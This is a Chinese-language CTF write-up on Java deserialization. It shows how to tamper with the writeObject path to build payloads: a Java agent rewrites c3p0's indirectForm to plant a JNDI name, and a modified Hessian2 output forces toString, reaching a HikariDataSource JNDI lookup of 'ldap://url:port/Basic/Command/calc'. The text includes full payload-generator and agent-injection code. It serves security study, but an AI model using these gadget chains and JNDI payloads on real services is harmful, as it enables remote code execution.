以前做一些 Java 反序列化的题目时,我个人觉得侧重点在于readObject
之后发生的事情:我们设法寻找可用的gadget
并拼接,最后用一行xxx.writeObject()
仅用来帮我们得到恶意数据。
最近学习过程中做了几个非常有意思的题目,总结一下其中共同的思想就是对writeObject
的流程下手,通过这部分流程中代码的一些问题来实现漏洞利用。
其实就是修改writeObject
流程中的源代码,视情况有以下这些办法:
ctrl+a
复制用到的类新建为一个类并修改相关操作如Hessian2Output
我们修改的流程刚好在writeObject
所在 Java 文件中
我们用动态 attach 注入方法,写好agentmain
后将其打包成 Jar 文件
记得修改文件中 MANIFEST.MF 文件
这里先学习了一下SerializationDumper,(https://www.freebuf.com/vuls/176672.html)
我们来看一下未修改前生成的数据:
我因我们想实现的是如下代码的效果:
java.util.Properties properties = new java.util.Properties(); javax.naming.CompoundName compoundName = new javax.naming.CompoundName("rmi://127.0.0.1:6666/calc", properties); this.contextName = compoundName;
所以说contextName肯定是个对象,那就要按照这样的格式去写
模仿已有的对象数据就行,然后知道这些知识点:
最终就有上面的序列化数据(什么?你问我是不是自己写的,肯定...不是)
然后就定位要插入的位置,将0x70直接替换
这个只是粗略的尝试了一下就成功了,修改序列化的数据应该是更麻烦(还要考虑偏移量等问题),之后还是要更深入学习下 JRE8u20 的构造及相关工具才行。
有一个反序列化入口并且过滤了ldap
字符串
还通过 Java Agent 技术过滤了一些东西
过滤了高版本 JNDI 的 EL 表达式绕过,题目存在 c3p0 依赖,但又要求 reference 不能有值,也过滤了一些链
在跟 c3p0 的 http base 链时,可以注意到在PoolBackedDataSourceBase
类的writeObject
方法中有如下内容:
尝试将当前对象的connectionPoolDataSource
属性进行序列化,如果不能序列化便会在catch中对connectionPoolDataSource
属性用ReferenceIndirector.indirectForm
方法处理后再进行序列化操作:
这个类是不能反序列化的,所以会进入catch模块:
我们可以控制 var2,但是 this.contextName 默认是 null 的
然后看PoolBackedDataSourceBase
类的readObject
方法:
跟进getObject方法:
当 this.contextName 不为空,才能触发 JNDI,所以我们可以想办法在indirectFrom
函数里插入些代码。
先运行这个:
package c3p0; import com.mchange.v2.c3p0.PoolBackedDataSource; import com.mchange.v2.naming.ReferenceIndirector; import javax.naming.*; import javax.sql.ConnectionPoolDataSource; import javax.sql.PooledConnection; import java.io.*; import java.sql.SQLException; import java.sql.SQLFeatureNotSupportedException; import java.util.logging.Logger; public class main { public static void main(String[] args) throws Exception{ Thread.sleep(5000);//sleep一会 PoolBackedDataSource a = new PoolBackedDataSource(); a.setConnectionPoolDataSource(new PoolSource()); writeFile("1.txt",serialize(a)); //deserialize(FiletoBytes("1.txt")); } private static final class PoolSource extends ReferenceIndirector implements ConnectionPoolDataSource, Referenceable { public PoolSource () { } public Reference getReference () throws NamingException { return null; } public PrintWriter getLogWriter () throws SQLException {return null;} public void setLogWriter ( PrintWriter out ) throws SQLException {} public void setLoginTimeout ( int seconds ) throws SQLException {} public int getLoginTimeout () throws SQLException {return 0;} public Logger getParentLogger () throws SQLFeatureNotSupportedException {return null;} public PooledConnection getPooledConnection () throws SQLException {return null;} public PooledConnection getPooledConnection ( String user, String password ) throws SQLException {return null;} } public static byte[] serialize(final Object obj) throws Exception { ByteArrayOutputStream btout = new ByteArrayOutputStream(); ObjectOutputStream objOut = new ObjectOutputStream(btout); objOut.writeObject(obj); return btout.toByteArray(); } public static Object deserialize(final byte[] serialized) throws Exception { ByteArrayInputStream btin = new ByteArrayInputStream(serialized); ObjectInputStream objIn = new ObjectInputStream(btin); return objIn.readObject(); } private static void writeFile(String filePath, byte[] content) throws Exception { FileOutputStream outputStream = new FileOutputStream(filePath); outputStream.write( content ); outputStream.close(); } public static byte[] FiletoBytes(String filename) throws Exception{ String buf = null; File file = new File(filename); FileInputStream fis = null; fis = new FileInputStream(file); int size = fis.available(); byte[] bytes = new byte[size]; fis.read(bytes); return bytes; } }
再运行动态注入的代码:
import com.sun.tools.attach.VirtualMachine; import com.sun.tools.attach.VirtualMachineDescriptor; import javassist.*; import java.lang.instrument.ClassDefinition; import java.lang.instrument.Instrumentation; import java.util.List; public class AgentDemo { public static void main(String[] args) throws Throwable{ Class.forName("sun.tools.attach.HotSpotAttachProvider"); List<VirtualMachineDescriptor> vms = VirtualMachine.list(); String targetPid = null; for (int i = 0; i < vms.size(); i++) { VirtualMachineDescriptor vm = vms.get(i); if (vm.displayName().contains("main")) { System.out.println(vm.displayName()); targetPid = vm.id(); System.out.println(targetPid); } } VirtualMachine virtualMachine = VirtualMachine.attach(targetPid); virtualMachine.loadAgent("out\\agent.jar",null); virtualMachine.detach(); } public static void agentmain(String agentOps, Instrumentation inst) throws Exception { for (Class allLoadedClass : inst.getAllLoadedClasses()) { if (allLoadedClass.getName().contains("c3p0.main")) { Class<?> elProcessorClass = Class.forName("com.mchange.v2.naming.ReferenceIndirector"); ClassPool classPool = new ClassPool(true); classPool.insertClassPath(new ClassClassPath(elProcessorClass)); classPool.insertClassPath(new LoaderClassPath(elProcessorClass.getClassLoader())); CtClass ctClass = classPool.get(elProcessorClass.getName()); CtMethod ctMethod = ctClass.getMethod("indirectForm","(Ljava/lang/Object;)Lcom/mchange/v2/ser/IndirectlySerialized;"); ctMethod.insertBefore(String.format("java.util.Properties properties = new java.util.Properties();\n" + " javax.naming.CompoundName compoundName = new javax.naming.CompoundName(\"rmi://127.0.0.1:6666/calc\",properties);" + "this.contextName=compoundName;",AgentDemo.class.getName())); inst.redefineClasses(new ClassDefinition(elProcessorClass,ctClass.toBytecode())); ctClass.detach(); } } } }
可以看到最终结果 contextName 的值:
接下来因为还有 yaml 依赖,所以打的就是 yaml 的绕过
还给了一个MyBean
类(以及为了实现它的toString
方法的两个其他类,不再多提)
熟悉 Rome 反序列化的就知道可以任意调用 getter 方法
所以思路就是找 hessian 触发 toString 的链子
可见:https://paper.seebug.org/1814/#hessian2input
跟进 read() 函数
先进入 readBuffer() 后返回 this._buffer[this._offset++] & 255
(其实就是 this._buffer[0] & 255)
如果我们能控制 tag 为 67
public String readString() throws IOException { int tag = this.read(); int ch; switch(tag) { case 0: case 1: case 2: case 3: ... case 31: this._isLastChunk = true; this._chunkLength = tag - 0; this._sbuf.setLength(0); while((ch = this.parseChar()) >= 0) { this._sbuf.append((char)ch); } return this._sbuf.toString(); case 32: case 33: ... case 67: ... case 127: default: throw this.expect("string", tag); case 48: case 49: case 50: ... case 253: case 254: case 255: return String.valueOf((tag - 248 << 8) + this.read()); } }
那么根据上次的 read 函数,这里返回的就是 this._buffer[1] 了,如果能控制返回的是 32-127 就能进入 expect 函数,我们还控制为 67(后面会解释)
protected IOException expect(String expect, int ch) throws IOException { if (ch < 0) { return this.error("expected " + expect + " at end of file"); } else { --this._offset; try { Object obj = this.readObject(); return obj != null ? this.error("expected " + expect + " at 0x" + Integer.toHexString(ch & 255) + " " + obj.getClass().getName() + " (" + obj + ")") : this.error("expected " + expect + " at 0x" + Integer.toHexString(ch & 255) + " null"); } catch (IOException var4) { log.log(Level.FINE, var4.toString(), var4); return this.error("expected " + expect + " at 0x" + Integer.toHexString(ch & 255)); } } }
最终触发 toString
跟进方法
到 PoolBase
最终达到 JNDI
import com.alibaba.com.caucho.hessian.io.Hessian2Input; import com.ctf.badbean.bean.MyBean; import java.io.*; import java.util.Base64; public class payload { public static void main(String[] args) throws IOException { ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream(); HikariDataSource ds = new HikariDataSource(); ds.setDataSourceJNDI("ldap://url:port/Basic/Command/calc"); Hessian2Output out = new Hessian2Output(byteArrayOutputStream); Object o = new MyBean("", "", ds, HikariDataSource.class); out.writeString("aaa"); out.writeObject(o); out.flushBuffer(); System.out.println(Base64.getEncoder().encodeToString(byteArrayOutputStream.toByteArray())); Hessian2Input hessian2Input = new Hessian2Input(new ByteArrayInputStream((byteArrayOutputStream.toByteArray()))); hessian2Input.readObject(); } }
我们重写了一个 HessianOutput 类来获得序列化数据,首先可以在 writeString 处对 this._buffer 赋值
第一个框中 buffer[offset++] = 67 是为了 将 this._buffer[0] 赋值为67,后一句则将 this._buffer[1] 赋值为67,至于为什么有这种效果等会再说
第二个框是为了对于我们想构造的数据不要再产生多余影响了,正常数据还是原来处理
然后跟入 writeObject 中
继续跟到
在这个函数中发现还有个赋值67的操作
还记得之前 this._offset = offset 吗,所以 this._buffer[1] = 67
现在回想下那两个框和我们要求的67,一切串起来后就会感觉构造的特别妙
这部分就是在做完题后学习 Dubbo 安全时看到的
我们可以使用hessian2对某个对象进行序列化,得到一段byte数组,修改数组中某个布尔值属性所对应的tag
目的还是进入expect
函数触发 toString,这里选取布尔值属性进行修改,用 binding 恶意对象将值覆盖(不太清楚为什么,但做了一些实验发现直接修改值会导致 obj = this.readObject() 失败,可能还是要更深入跟踪序列化过程,这里就学习一下思路)
顺便浅说一下师傅的这部分代码,因为是要打 Dubbo 服务的,所以加上头部字段,我们简单复现的话也不必要加
最终打到了:
https://firebasky.github.io/2022/06/04/ljctr-wp/
http://miku233.viewofthai.link/2022/08/29/2022%E7%BD%91%E9%BC%8E%E6%9D%AFJava/